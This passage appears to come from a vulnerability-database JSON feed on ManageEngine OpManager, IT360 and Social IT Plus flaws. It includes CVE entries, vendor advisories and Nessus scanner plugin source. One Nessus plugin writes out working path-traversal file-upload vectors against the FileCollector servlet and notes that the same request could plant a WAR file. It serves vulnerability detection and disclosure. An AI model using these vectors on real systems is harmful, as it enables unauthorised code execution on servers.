"cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_opmanager:11.0", "cpe:/a:zohocorp:manageengine_opmanager:10.0", "cpe:/a:zohocorp:manageengine_opmanager:8.8", "cpe:/a:zohocorp:manageengine_opmanager:11.2", "cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_opmanager:9.4", "cpe:/a:zohocorp:manageengine_opmanager:9.0", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-7866", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7866", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:8.8:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_social_it_plus:11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:51:28", "description": "Multiple SQL injection vulnerabilities in ZOHO ManageEngine OpManager 11.3 and 11.4, IT360 10.3 and 10.4, and Social IT Plus 11.0 allow remote attackers or remote authenticated users to execute arbitrary SQL commands via the (1) OPM_BVNAME parameter in a Delete operation to the APMBVHandler servlet or (2) query parameter in a compare operation to the DataComparisonServlet servlet.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-7868", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7868"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_it360:10.4", "cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-7868", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7868", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_social_it_plus:11.0:*:*:*:*:*:*:*"]}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet FILENAME parameter\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-11-30T00:00:00", "id": "E-407", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager MigrateCentralData servlet\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager MigrateCentralData Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2014-11-30T00:00:00", "id": "E-404", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager MigrateLEEData servlet\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager MigrateLEEData Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2014-11-30T00:00:00", "id": "E-406", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T21:14:34", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the AgentDataHandler class. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager AgentDataHandler FILENAME File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-142", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-142/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:34", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the MigrateCentralData servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager MigrateCentralData zipFileName File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-144", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-144/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:31", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the MigrateLEEData servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager MigrateLEEData fileName File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-145", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-145/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:35", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the APMIntegBusinessViewHandler servlet. The issue lies in the failure to sanitize user-supplied input prior to executing a SQL statement. An attacker could leverage this vulnerability to execute code under the context of the database, which defaults to SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager APMIntegBusinessViewHandler allDevicesRemoved SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7868"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-140", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-140/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:33", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DataComparisonServlet servlet. The issue lies in the ability to execute arbitrary SQL statements. An attacker could leverage this vulnerability to execute code under the context of the database, which defaults to SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager DataComparisionServlet query SQL Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7868"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-141", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-141/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:36", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the APMIntegBusinessViewHandler servlet. The issue lies in the failure to sanitize user-supplied input prior to executing a SQL statement. An attacker could leverage this vulnerability to execute code under the context of the database, which defaults to SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager APMIntegBusinessViewHandler Delete SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7868"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-139", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-139/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:00:03", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation in HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations.", "cvss3": {}, "published": "2014-10-13T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products FileCollector Directory Traversal (CVE-2014-6035)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-10-28T00:00:00", "id": "CPAI-2014-1905", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:50:08", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation in HTTP requests. A remote unauthenticated attacker can exploit this vulnerability by uploading arbitrary files to arbitrary locations.", "cvss3": {}, "published": "2015-05-11T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products Multiple Directory Traversal (CVE-2014-7866)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2015-05-18T00:00:00", "id": "CPAI-2015-0559", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-19T00:01:09", "description": "An SQL injection vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to insufficient input validation of the OPM_BVNAME parameter when processing requests using the APMBVHandler servlet. A remote attacker can exploit this vulnerability to inject and execute arbitrary SQL code on the affected system.", "cvss3": {}, "published": "2015-08-10T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products Multiple SQL Injections (CVE-2014-7868)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7868"], "modified": "2015-12-30T00:00:00", "id": "CPAI-2015-0963", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:46:50", "description": "The version of ManageEngine OpManager installed on the remote host is affected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize user-supplied input to the 'regionID' and 'FILENAME' parameters when uploading files. This allows a remote attacker and authenticated users to write to and execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize user-supplied input to the 'fileName' parameter. This allows a remote attacker and authenticated users to delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file upload vulnerabilities; however, it did not test for the arbitrary code execution or file deletion vulnerabilities. If a file can be uploaded via the directory traversal attack, then the execution and deletion flaws are likely exploitable as well.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-16T00:00:00", "type": "nessus", "title": "ManageEngine OpManager Multiple Directory Traversal Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL", "href": "https://www.tenable.com/plugins/nessus/81378", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81378);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6034\", \"CVE-2014-6035\", \"CVE-2014-6036\");\n script_bugtraq_id(70167, 70169, 70172);\n\n script_name(english:\"ManageEngine OpManager Multiple Directory Traversal Vulnerabilities\");\n script_summary(english:\"Attempts to upload a file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby multiple directory traversal vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine OpManager installed on the remote host is\naffected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize\n user-supplied input to the 'regionID' and 'FILENAME'\n parameters when uploading files. This allows a remote\n attacker and authenticated users to write to and\n execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize\n user-supplied input to the 'fileName' parameter. This\n allows a remote attacker and authenticated users to\n delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file\nupload vulnerabilities; however, it did not test for the arbitrary\ncode execution or file deletion vulnerabilities. If a file can be\nuploaded via the directory traversal attack, then the execution and\ndeletion flaws are likely exploitable as well.\");\n # https://pitstop.manageengine.com/portal/kb/articles/servlet-vulnerability-fix\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d44b4150\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Sep/110\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine OpManager version 11.3 and apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6035\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"ManageEngine OpManager FileCollector Servlet File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine OpManager and Social IT Arbitrary File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_opmanager\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_opmanager_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine OpManager\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ManageEngine OpManager\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\nunique = rand_str(length:10);\nfile = \"nessus_delete_this_file_\" + unique + \".css\";\n\n# Try to upload a CSS file\n# While we don't try to upload a WAR file directly, if we can\n# upload a CSS file we could use the same request to upload a WAR\n# file which would allow for remote code execution\npostdata = 'Nessus Check: '+unique;\n\n# Couple of vectors to test\nvectors = make_list(\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=../../../webclient/common/css/\"+file,\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=..\\\\..\\\\..\\\\webclient\\\\common\\\\css\\\\\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../webclient/common/css&FILENAME=\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=..\\\\..\\\\..\\\\webclient\\\\common\\\\css&FILENAME=\"+file\n);\n\nuploaded = FALSE;\nexecuted = FALSE;\nvecurl = \"\";\nforeach vector (vectors)\n{\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item : dir+vector,\n data : postdata,\n content_type : \"text/html\",\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n\n # Try and access our uploaded file\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"webclient/common/css/\" +file,\n exit_on_fail : TRUE\n );\n\n # Only need to upload one file\n if(\"Nessus Check: \"+unique >< res[2])\n {\n uploaded = TRUE;\n vecurl = vector;\n break;\n }\n}\n\nif (uploaded)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : dir+\"webclient/common/css/\"+file,\n line_limit : 10,\n request : make_list(exp_request),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n );\n} else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T14:40:55", "description": "The remote host is running a version of Zoho ManageEngine OpManager that is affected by multiple vulnerabilities : \n\n - A blind SQL injection vulnerability exists due to improper sanitization of user-supplied input to the 'OPM_BVNAME' parameter of the APMBVHandler servlet. An unauthenticated, remote attacker can exploit this to modify the application's database and potentially gain administrative rights. (CVE-2014-7868 / CVE-2016-82014)\n\n - A reflected cross-site scripting (XSS) vulnerability exists due to improper validation of user-supplied input to the 'OPM_BVNAME' parameter of the APMBVHandler servlet. A context-dependent attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session.\n (CVE-2016-82015)\n\nNote that additional SQL injection vulnerabilities exist; however, Nessus has not tested for these.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-16T00:00:00", "type": "nessus", "title": "Zoho ManageEngine OpManager 'OPM_BVNAME' Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7868", "CVE-2016-82014", "CVE-2016-82015"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_OPM_BVNAME_SQLI.NASL", "href": "https://www.tenable.com/plugins/nessus/81379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81379);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7868\", \"CVE-2016-82014\", \"CVE-2016-82015\");\n script_bugtraq_id(71002);\n script_xref(name:\"TRA\", value:\"TRA-2016-10\");\n script_xref(name:\"EDB-ID\", value:\"35209\");\n \n script_name(english:\"Zoho ManageEngine OpManager 'OPM_BVNAME' Multiple Vulnerabilities\");\n script_summary(english:\"Attempts to exploit the flaw.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a web application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Zoho ManageEngine OpManager\nthat is affected by multiple vulnerabilities : \n\n - A blind SQL injection vulnerability exists due to\n improper sanitization of user-supplied input to the\n 'OPM_BVNAME' parameter of the APMBVHandler servlet. An\n unauthenticated, remote attacker can exploit this to\n modify the application's database and potentially gain\n administrative rights. (CVE-2014-7868 / CVE-2016-82014)\n\n - A reflected cross-site scripting (XSS) vulnerability\n exists due to improper validation of user-supplied input\n to the 'OPM_BVNAME' parameter of the APMBVHandler\n servlet. A context-dependent attacker can exploit this,\n via a specially crafted request, to execute arbitrary\n script code in a user's browser session.\n (CVE-2016-82015)\n\nNote that additional SQL injection vulnerabilities exist; however,\nNessus has not tested for these.\");\n # https://pitstop.manageengine.com/portal/kb/articles/sql-injection-vulnerability-fix\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f9f0ae00\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2016-10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Zoho has released a patch for ManageEngine OpManager versions 11.3,\n11.4, and 11.5; however, the patch is only a partial fix. Upgrade to\nOpManager version 11.6 for the full fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_opmanager\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n\n 